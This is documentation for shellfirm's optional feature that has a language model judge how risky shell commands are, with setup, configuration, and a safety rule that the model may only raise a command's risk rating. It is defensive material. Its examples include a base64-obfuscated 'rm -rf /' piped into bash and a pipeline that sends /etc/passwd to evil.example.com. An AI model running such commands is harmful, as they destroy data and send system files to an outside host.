$ shellfirm

LLM-Powered Analysis

Optional semantic command analysis that catches risks regex patterns miss

shellfirm's core engine uses regex pattern matching, which is fast and reliable. But regex has blind spots: obfuscated commands, complex pipelines, and semantically dangerous operations can slip through. The optional LLM analysis layer adds semantic understanding to catch what regex misses.

How it works

When LLM analysis is enabled (feature flag: llm), shellfirm sends the command along with context hints and matched pattern descriptions to a large language model. The LLM returns:

  • Risk assessment -- whether the command is considered risky, plus a risk score (0.0 to 1.0)
  • Explanation -- human-readable description of identified risks
  • Additional risks -- risks not caught by regex patterns
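The shape of that response can be sketched as a small struct (field and type names here are illustrative assumptions, not shellfirm's actual API):

```rust
// Illustrative sketch of an LLM analysis result. The field names and
// types are assumptions for clarity, not shellfirm's real types.
#[derive(Debug)]
pub struct LlmAnalysis {
    pub risky: bool,                   // risk assessment verdict
    pub risk_score: f32,               // 0.0 (benign) to 1.0 (dangerous)
    pub explanation: String,           // human-readable risk description
    pub additional_risks: Vec<String>, // risks not caught by regex patterns
}

fn example() -> LlmAnalysis {
    LlmAnalysis {
        risky: true,
        risk_score: 0.9,
        explanation: "Pipes a base64-decoded payload into bash".into(),
        additional_risks: vec!["obfuscated destructive command".into()],
    }
}

fn main() {
    println!("{:?}", example());
}
```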

The safety invariant

LLM analysis follows the same security invariant as the rest of shellfirm:

LLM can only escalate risk, never reduce it.

If regex patterns flag a command as risky, the LLM cannot override that assessment and allow it. The LLM can only:

  • Add additional risks that regex missed
  • Increase the severity level
  • Provide richer explanations

If the LLM call fails (timeout, API error, rate limit), shellfirm silently falls back to regex-only results. LLM failure never blocks a command that regex considers safe.
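The escalate-only invariant and the failure fallback can be sketched together as a single merge rule (assumed logic for illustration, not shellfirm's actual implementation):

```rust
// Sketch of the escalate-only merge: the LLM result can raise the
// regex-derived risk score but never lower it, and any LLM failure
// (timeout, API error, rate limit) falls back to the regex score.
// This is an illustrative model, not shellfirm's real code.
fn merge_score(regex_score: f32, llm_result: Result<f32, String>) -> f32 {
    match llm_result {
        // The LLM may only escalate, never reduce.
        Ok(llm_score) => regex_score.max(llm_score),
        // On failure, silently keep the regex-only assessment.
        Err(_) => regex_score,
    }
}

fn main() {
    assert_eq!(merge_score(0.8, Ok(0.2)), 0.8); // cannot reduce risk
    assert_eq!(merge_score(0.3, Ok(0.9)), 0.9); // can escalate risk
    assert_eq!(merge_score(0.5, Err("timeout".to_string())), 0.5); // fallback
    println!("escalate-only merge holds");
}
```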

Setup

1. Install with LLM support

shellfirm's LLM feature is included by default:

cargo install shellfirm  # includes llm feature

To install without LLM support:

cargo install shellfirm --no-default-features --features cli

2. Set your API key

export SHELLFIRM_LLM_API_KEY="your-api-key-here"

Add this to your shell profile for persistence.

3. Configure the provider

LLM analysis is not configured by default. Enable it via CLI or settings file:

shellfirm config llm --provider anthropic --model claude-sonnet-4-20250514

Or edit ~/.config/shellfirm/settings.yaml directly:

llm:
  provider: anthropic          # "anthropic" or "openai-compatible"
  model: claude-sonnet-4-20250514  # model ID
  timeout_ms: 5000             # request timeout (default: 5000ms)
  max_tokens: 512              # max response tokens (default: 512)

Using OpenAI-compatible providers

For providers with an OpenAI-compatible API (local models, other cloud providers):

llm:
  provider: openai-compatible
  model: your-model-name
  base_url: http://localhost:8080/v1
  timeout_ms: 10000
  max_tokens: 512

What LLM catches that regex misses

Obfuscated commands

Regex checks for rm -rf / but may miss:

# Base64 encoded dangerous command
echo "cm0gLXJmIC8=" | base64 -d | bash

The LLM can recognize that this decodes to a destructive command.

Complex pipeline risks

# Innocent-looking pipe that exfiltrates data
cat /etc/passwd | curl -X POST -d @- https://evil.example.com

Regex patterns check individual command segments. The LLM can understand the semantic intent of the full pipeline.
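A rough illustration of why per-segment matching misses this (the splitter below is a hypothetical simplification, not shellfirm's parser):

```rust
// Hypothetical per-segment view of a pipeline. Each piece of the
// exfiltration pipeline looks individually benign; only the
// combination is dangerous. Not shellfirm's actual engine.
fn segments(cmd: &str) -> Vec<&str> {
    cmd.split('|').map(str::trim).collect()
}

fn main() {
    let cmd = "cat /etc/passwd | curl -X POST -d @- https://evil.example.com";
    for seg in segments(cmd) {
        // Neither "cat /etc/passwd" nor the curl upload alone matches
        // a destructive-command pattern; the LLM sees the whole pipe.
        println!("segment: {}", seg);
    }
}
```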

Context-dependent danger

# Safe in development, dangerous in production
python manage.py flush --no-input

The LLM can factor in context signals (production env vars, k8s context) to assess risk more accurately.
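One way such context signals could be collected is sketched below (the variable names and filtering logic are assumptions for illustration, not shellfirm's actual behavior):

```rust
// Hypothetical collection of context hints to send alongside the
// command. The chosen variable names are assumptions; in real use the
// input would come from std::env::vars().
fn context_hints(vars: Vec<(String, String)>) -> Vec<String> {
    vars.into_iter()
        // Keep only signals that hint at the execution environment.
        .filter(|(k, _)| matches!(k.as_str(), "ENVIRONMENT" | "NODE_ENV" | "KUBECONFIG"))
        .map(|(k, v)| format!("{}={}", k, v))
        .collect()
}

fn main() {
    // Fixed sample in place of the live environment.
    let hints = context_hints(vec![
        ("NODE_ENV".to_string(), "production".to_string()),
        ("HOME".to_string(), "/home/user".to_string()),
    ]);
    println!("{:?}", hints);
}
```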

Configuration reference

The llm section is not present by default. Once configured, these are the available settings:

| Setting | Default (when configured) | Description |
| --- | --- | --- |
| llm.provider | anthropic | LLM provider (anthropic or openai-compatible) |
| llm.model | claude-sonnet-4-20250514 | Model identifier |
| llm.base_url | (none) | Custom API base URL for openai-compatible providers |
| llm.timeout_ms | 5000 | API request timeout in milliseconds |
| llm.max_tokens | 512 | Maximum tokens in LLM response |

Environment variables

| Variable | Description |
| --- | --- |
| SHELLFIRM_LLM_API_KEY | API key for the configured LLM provider |
| SHELLFIRM_LLM_PROVIDER | Override the provider from settings |

Performance considerations

  • LLM analysis adds latency to each command check (typically 500-2000 ms, depending on provider and model)
  • The timeout prevents LLM slowness from blocking your workflow
  • If the timeout is reached, shellfirm falls back to regex-only results
  • LLM analysis is skipped for commands that match no regex patterns (no context to send)
  • Consider the cost implications of API calls for every command
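The timeout behavior described above can be sketched as a bounded call (an illustrative pattern, not shellfirm's implementation):

```rust
// Sketch of bounding a slow LLM call: run it on a worker thread and
// wait at most `timeout`. On timeout, return None so the caller can
// fall back to regex-only results. Illustrative pattern only.
use std::sync::mpsc;
use std::thread;
use std::time::Duration;

fn call_with_timeout<F, T>(f: F, timeout: Duration) -> Option<T>
where
    F: FnOnce() -> T + Send + 'static,
    T: Send + 'static,
{
    let (tx, rx) = mpsc::channel();
    thread::spawn(move || {
        // Ignore the send error if the receiver already gave up.
        let _ = tx.send(f());
    });
    rx.recv_timeout(timeout).ok()
}

fn main() {
    // Simulated slow LLM call that overruns its budget (scaled down
    // from the 5000 ms default for the example).
    let slow = || {
        thread::sleep(Duration::from_millis(50));
        0.9_f32
    };
    let verdict = call_with_timeout(slow, Duration::from_millis(10));
    assert!(verdict.is_none()); // timed out -> regex-only fallback
    println!("timed out -> regex-only fallback");
}
```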